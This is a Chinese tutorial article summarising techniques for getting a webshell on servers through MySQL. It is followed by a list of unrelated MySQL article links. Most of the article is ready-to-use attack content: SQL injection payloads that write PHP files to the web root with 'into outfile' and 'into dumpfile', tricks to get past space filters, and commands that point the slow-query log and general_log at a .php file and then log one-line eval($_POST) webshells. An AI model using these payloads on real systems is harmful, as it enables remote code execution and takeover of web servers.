mysql数据库中getshell的方式总结

更新时间：2022年07月11日 14:49:55 作者：Z3eyOnd

MySQL版本大于5.0，MySQL 5.0版本以上会创建日志文件,我们通过修改日志文件的全局变量,就可以GetSHELL,下面这篇文章主要给大家介绍了关于mysql数据库中getshell的方式,需要的朋友可以参考下

outfile和dumpfile写shell

利用条件

数据库当前用户为root权限；
知道当前网站的绝对路径；
PHP的GPC为 off状态；(魔术引号，GET，POST，Cookie)
写入的那个路径存在写入权限。

基于union联合查询：

?id=1 union select 1,'<?php phpinfo();?>',3 into outfile 'C:\phpstudy\www\shell.php'%23
?id=1 union select 1,'<?php phpinfo();?>',3 into dumpfile 'C:\phpstudy\www\shell.php'%23

非联合查询

当我们无法使用联合查询时，我们可以使用fields terminated by与lines terminated by来写shell

?id=1 into outfile 'C:\phpstudy\www\shell.php' FIELDS TERMINATED BY '<?php phpinfo();?>'%23

代替空格的方法

+号，%0a、%0b、%a0 、 /**/ 注释符等

outfile和dumpfile的区别

outfile:

1、支持多行数据同时导出

2、使用union联合查询时，要保证两侧查询的列数相同

3、会在换行符制表符后面追加反斜杠

4、会在末尾追加换行

dumpfile:

1、每次只能导出一行数据

2、不会在换行符制表符后面追加反斜杠

3、不会在末尾追加换行

因此，我们可以使用into dumpfile这个函数来顺利写入二进制文件;

当然into outfile函数也可以写入二进制文件，但是无法生效（追加的反斜杠会使二进制文件无法生效）

当我们使用dumpfile，应该手动添加 limit 限制，来获取不同的行数

secure_file_prive

MySQL的secure-file-prive参数是用来限制LOAD DATA, SELECT ,OUTFILE, and LOAD_FILE()传到哪个指定目录的。

secure_file_prive= ，结果为空的话，表示允许任何文件读写

secure_file_prive=NULL，表示不允许任何文件读写

secure_file_prive=‘某个路径’，表示这个路径作为文件读写的路径

在mysql5.5版本前，都是默认为空，允许读取

在mysql5.6版本后 ,默认为NULL，并且无法用SQL语句对其进行修改。所以这种只能在配置进行修改。

查询secure_file_prive的参数

show global variables like "%secure%"

利用sql语句修改参数

set global secure_file_prive=

但是5.6后不能利用sql修改了，所以只能利用配置修改

修改value的值：
windows下修改配置文件：mysql.ini
linux修改配置文件：my.cnf

日志getshell

慢日志getshell

慢日志：

一般都是通过long_query_time选项来设置这个时间值，时间以秒为单位，可以精确到微秒。如果查询时间超过了这个时间值（默认为10秒），这个查询语句将被记录到慢查询日志中。查看服务器默认时间值方式如下：

show global variables like '%long_query_time%'
show global variables like '%long%'

查看慢日志参数

show global variables like '%slow%'

对慢日志参数进行修改

set global slow_query_log=1 #打开慢日志
set global slow_query_log_file='c:\\phpstudy\\www\\test.php'#慢日志的路径
注意：一定要用双反斜杠
SELECT '<?php @eval($_POST[1]);?>' or sleep(11)
这儿11是超过慢日志的10秒时间

利用general_log

利用general_log，可以将所有到达mysql服务器的sql语句，都记录下来。

相关参数一共有3个：general_log、log_output、general_log_file

show variables like 'general_log';  -- 查看日志是否开启
set global general_log=on; -- 开启日志功能


show variables like 'general_log_file';  -- 看看日志文件保存位置
set global general_log_file='tmp/general.lg'; -- 设置日志文件保存位置


show variables like 'log_output';  -- 看看日志输出类型  table或file
set global log_output='table'; -- 设置输出类型为 table
set global log_output='file';   -- 设置输出类型为file

一般log_output都是file,就是将日志存入文件中。table的话就是将日志存入数据库的日志表中。

getshell

set global general_log=on
set global general_log_file='需要攻击的路径'
select '<?php eval($_POST[cmd]);?>'

这样就将一句话木马记录到general_log中，从而getshell

binlog的介绍

可以看看这个

总结

到此这篇关于mysql数据库中getshell方式的文章就介绍到这了,更多相关mysql getshell的方式内容请搜索脚本之家以前的文章或继续浏览下面的相关文章希望大家以后多多支持脚本之家！

mysql8如何设置不区分大小写ubuntu20
这篇文章主要介绍了mysql8如何设置不区分大小写ubuntu20问题，具有很好的参考价值，希望对大家有所帮助。如有错误或未考虑完全的地方，望不吝赐教
2023-05-05
MySQL表内连和外连的具体使用
我们在使用MySQL的时候,经常涉及到内连接和外连接的应用,本文就来详细的介绍一下MySQL表内连和外连的具体使用,感兴趣的可以了解一下
2023-10-10
linux服务器清空MySQL的history历史记录删除mysql操作记录
mysql历史记录上可能留下了很多敏感信息，比如密码什么的,需及时清空历史记录,下面分享一下inux服务器清空MySQL的history历史记录的方法
2014-01-01
MySQL执行计划的深入分析
这篇文章主要给大家介绍了关于MySQL执行计划的相关资料，文中通过示例代码介绍的非常详细，对大家的学习或者工作具有一定的参考学习价值，需要的朋友们下面随着小编来一起学习学习吧
2019-01-01
mysql中decimal数据类型小数位填充问题详解
这篇文章主要介绍了mysql中decimal数据类型小数位填充问题详解，文中通过示例代码介绍的非常详细，对大家的学习或者工作具有一定的参考学习价值，需要的朋友们下面随着小编来一起学习学习吧
2021-02-02
MySQL通过实例化对象参数查询实例讲解
在本篇文章里我们给大家分享了关于MySQL如何通过实例化对象参数查询数据的相关知识点内容，有需要的朋友们可以测试参考下。
2018-10-10
MySQL数据库 JDBC 编程(Java 连接 MySQL)
这篇文章主要介绍了MySQL数据库 JDBC 编程Java 连接 MySQL,在 Java 中，这样的封装就是由 Java 标准库来完成的，封装出了一套统一的数据库 API 称为 JDBC,下面来看文章的详细介绍吧
2021-12-12
mysql数据库如何导入导出sql文件
这篇文章主要介绍了mysql数据库如何导入导出sql文件问题,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教
2023-11-11
MySQL查询优化:连接查询排序limit(join、order by、limit语句)介绍
两张表连接查询并limit，SQL效率很高，但是加上order by以后，语句的执行时间变的巨长，效率巨低，接下来为大家介绍下连接查询排序limit
2013-04-04
Mysql数据库之索引优化
MySQL凭借着出色的性能、低廉的成本、丰富的资源，已经成为绝大多数互联网公司的首选关系型数据库。本文给大家介绍mysql数据库之索引优化，感兴趣的朋友一起学习吧
2016-03-03